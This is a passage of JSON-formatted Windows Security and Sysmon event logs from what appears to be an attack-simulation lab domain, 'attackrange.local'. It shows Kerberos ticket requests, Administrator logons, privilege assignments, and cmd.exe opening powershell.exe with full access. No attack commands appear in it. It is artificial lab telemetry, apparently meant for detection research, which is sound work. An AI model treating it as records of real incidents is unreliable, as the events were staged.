EAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220447,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220448,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220449,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220450,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66EE9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x66ee9","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220451,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66EE9\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x66ee9","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220452,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220453,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220454,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220455,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x671B5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x671b5","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220456,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x671B5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x671b5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nSourceProcessId: 3556\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","SourceProcessId":"3556","SourceThreadId":"4104","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
